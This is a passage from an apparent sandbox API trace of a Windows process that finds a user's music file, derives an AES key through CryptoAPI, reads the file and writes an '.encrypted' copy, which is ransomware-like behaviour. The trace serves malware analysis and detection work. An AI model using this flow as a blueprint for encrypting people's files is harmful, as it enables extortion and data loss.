returned 0 [0037.407] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0037.407] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0037.407] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0037.407] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0037.407] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0037.407] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0037.407] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0037.407] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0037.407] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\5kW9-9BV3.m4a", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4f5e1710, ftCreationTime.dwHighDateTime=0x1d5c192, ftLastAccessTime.dwLowDateTime=0x965cd70, ftLastAccessTime.dwHighDateTime=0x1d5c0e8, ftLastWriteTime.dwLowDateTime=0x965cd70, ftLastWriteTime.dwHighDateTime=0x1d5c0e8, nFileSizeHigh=0x0, nFileSizeLow=0x187d4, dwReserved0=0x0, dwReserved1=0x777648, cFileName="5kW9-9BV3.m4a", cAlternateFileName="5KW9-9~1.M4A")) returned 0x7c20c0 [0037.407] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0037.408] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.408] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0037.408] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1300 [0037.408] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0037.408] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0037.408] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1328 [0037.408] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0037.408] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0037.408] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0037.408] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\5kW9-9BV3.m4a", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4f5e1710, ftCreationTime.dwHighDateTime=0x1d5c192, ftLastAccessTime.dwLowDateTime=0x965cd70, ftLastAccessTime.dwHighDateTime=0x1d5c0e8, ftLastWriteTime.dwLowDateTime=0x965cd70, ftLastWriteTime.dwHighDateTime=0x1d5c0e8, nFileSizeHigh=0x0, nFileSizeLow=0x187d4, dwReserved0=0x0, dwReserved1=0x777648, cFileName="5kW9-9BV3.m4a", cAlternateFileName="5KW9-9~1.M4A")) returned 0x7c20c0 [0037.408] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0037.408] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.408] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0037.408] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0037.408] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0037.408] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0037.408] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0037.408] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\5kW9-9BV3.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.408] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\5kW9-9BV3.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.408] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\5kW9-9BV3.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.408] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\5kW9-9BV3.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.408] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Music\\5kW9-9BV3.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.408] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Music\\5kW9-9BV3.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.408] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Music\\5kW9-9BV3.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.408] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Music\\5kW9-9BV3.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.409] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Music\\5kW9-9BV3.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.409] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Music\\5kW9-9BV3.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.409] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Music\\5kW9-9BV3.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.409] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Music\\5kW9-9BV3.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.409] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Music\\5kW9-9BV3.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.409] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Music\\5kW9-9BV3.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.409] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Music\\5kW9-9BV3.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.409] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Music\\5kW9-9BV3.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.409] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Music\\5kW9-9BV3.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.409] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Music\\5kW9-9BV3.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.409] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Music\\5kW9-9BV3.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.409] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Music\\5kW9-9BV3.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.409] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Music\\5kW9-9BV3.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.409] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Music\\5kW9-9BV3.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.409] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Music\\5kW9-9BV3.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.409] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Music\\5kW9-9BV3.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.409] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Music\\5kW9-9BV3.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.409] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Music\\5kW9-9BV3.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.409] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Music\\5kW9-9BV3.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.409] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Music\\5kW9-9BV3.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.409] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Music\\5kW9-9BV3.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.409] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Music\\5kW9-9BV3.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.409] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Music\\5kW9-9BV3.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.409] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Music\\5kW9-9BV3.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.409] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="usic\\5kW9-9BV3.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.409] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sic\\5kW9-9BV3.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.409] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ic\\5kW9-9BV3.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.409] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="c\\5kW9-9BV3.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.409] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5kW9-9BV3.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.409] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5kW9-9BV3.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.409] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kW9-9BV3.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.409] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="W9-9BV3.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.409] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="9-9BV3.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.409] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-9BV3.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.410] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="9BV3.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.410] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.410] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0037.410] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b45c8 [0037.410] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0037.410] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0037.410] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0037.410] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18a0 [0037.410] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0037.410] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0037.410] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="a", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0037.410] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4a", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0037.410] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="m4a", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0037.410] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".m4a", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0037.410] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0037.410] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0037.410] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0037.410] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0037.410] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c10 [0037.410] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0037.410] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0037.410] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0037.410] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0037.410] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1800 [0037.410] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0037.410] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0037.410] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0037.411] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0037.411] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0037.411] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0037.411] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\5kW9-9BV3.m4a", lpFindFileData=0x6ae7b8 | out: lpFindFileData=0x6ae7b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4f5e1710, ftCreationTime.dwHighDateTime=0x1d5c192, ftLastAccessTime.dwLowDateTime=0x965cd70, ftLastAccessTime.dwHighDateTime=0x1d5c0e8, ftLastWriteTime.dwLowDateTime=0x965cd70, ftLastWriteTime.dwHighDateTime=0x1d5c0e8, nFileSizeHigh=0x0, nFileSizeLow=0x187d4, dwReserved0=0x6ae908, dwReserved1=0x777648, cFileName="5kW9-9BV3.m4a", cAlternateFileName="5KW9-9~1.M4A")) returned 0x7c2240 [0037.411] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0037.411] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0037.411] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0037.411] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x754b0000 [0037.411] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0037.411] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0037.411] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0037.411] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0037.411] CryptAcquireContextA (in: phProv=0x6ae498, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6ae498*=0x7d5b30) returned 1 [0037.412] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0037.412] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0037.412] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0037.412] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0037.412] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0037.412] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0037.412] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0037.412] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0037.413] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0037.413] CryptCreateHash (in: hProv=0x7d5b30, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x6ae208 | out: phHash=0x6ae208) returned 1 [0037.413] CharLowerBuffW (in: lpsz="byte[256]", cchLength=0x9 | out: lpsz="byte[256]") returned 0x9 [0037.413] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0037.413] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0037.413] CryptHashData (hHash=0x7c2100, pbData=0x7c95d0, dwDataLen=0x100, dwFlags=0x1) returned 1 [0037.413] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0037.413] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0037.413] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2b8 | out: hHeap=0x770000) returned 1 [0037.413] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0037.413] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c60 | out: hHeap=0x770000) returned 1 [0037.413] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2b8 | out: hHeap=0x770000) returned 1 [0037.413] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0037.413] CryptDeriveKey (in: hProv=0x7d5b30, Algid=0x660e, hBaseData=0x7c2100, dwFlags=0x1, phKey=0x6ae208 | out: phKey=0x6ae208*=0x7c2280) returned 1 [0037.413] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0037.413] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0037.413] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0037.413] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0037.413] CryptDestroyHash (hHash=0x7c2100) returned 1 [0037.413] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\5kW9-9BV3.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\5kw9-9bv3.m4a"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0037.414] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0037.414] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae940 | out: lpNewFilePointer=0x0) returned 1 [0037.414] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.414] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.414] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2100 | out: hHeap=0x770000) returned 1 [0037.414] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.414] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\5kW9-9BV3.encrypted.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\5kw9-9bv3.encrypted.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0037.414] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.414] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.414] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2200 | out: hHeap=0x770000) returned 1 [0037.414] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.414] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.415] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae990 | out: lpNewFilePointer=0x0) returned 1 [0037.415] ReadFile (in: hFile=0x128, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6ae9b8*=0x10000, lpOverlapped=0x0) returned 1 [0037.417] ReadFile (in: hFile=0x128, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6ae9b8*=0x87d4, lpOverlapped=0x0) returned 1 [0037.418] ReadFile (in: hFile=0x128, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6ae9b8*=0x0, lpOverlapped=0x0) returned 1 [0037.418] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0037.418] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0037.418] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0037.420] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.420] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.420] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.420] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0037.420] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0037.420] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0037.421] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.421] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.421] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0037.421] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0037.421] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3a8 | out: hHeap=0x770000) returned 1 [0037.421] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0037.421] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0037.421] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0037.421] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0037.421] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0037.421] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0037.421] HeapFree 